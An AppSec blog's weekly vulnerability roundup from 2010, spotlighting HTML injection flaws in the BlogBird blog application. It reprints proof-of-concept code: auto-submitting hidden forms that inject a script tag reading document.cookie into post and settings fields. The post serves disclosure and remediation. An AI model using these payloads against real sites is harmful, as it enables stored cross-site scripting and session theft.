AppSec Blog

AppSec Blog

Weekly Roundup of @Risk Web Application Vulnerabilities

Volume: IX, Issue: 45
November 4, 2010


Summary of the vulnerabilities reported this week:


Web Application - Cross Site Scripting

Web Application

This Week's @Risk Spotlight

  • 10.45.29 - CVE: Not Available
  • Platform: Web Application
  • Title: BlogBird Multiple HTML Injection Issues
  • Description: BlogBird is a blog application. The application is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/44465
The example exploit code shows that there are two different hidden form values (body and title) that are vulnerable to XSS:
<form action="http://www.blogbird.nl/elements/save/2648" method="post" name="main">
<input type="hidden" name="files_id" value="123">
<input type="hidden" name="type" value="posts">
<input type="hidden" name="column" value="col1">
<input type="hidden" name="title" value="post title">
<input type="hidden" name="element" value="post">
<input type="hidden" name="body" value='post text"><script>alert(document.cookie)</script>'>
<input type="hidden" name="extended" value="">
<input type="hidden" name="publish" value="1">
<input type="hidden" name="page" value="home">
<input type="hidden" name="author" value="author">
<input type="hidden" name="tags" value="">
</form>
<script>
document.main.submit();
</script>

<form action="http://www.blogbird.nl/settings/save" method="post" name="main">
<input type="hidden" name="title" value='My Blog Title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="language" value="dutch">
<input type="hidden" name="date_format" value="">
<input type="hidden" name="per_page" value="0">
</form>
<script>
document.main.submit();
</script>


These parameter payloads are not being properly output encoded when the data is used in subsequent pages and sent back to users. See the OWASP XSS Prevention Cheatsheet for more info.

Post a Comment






* Indicates a required field.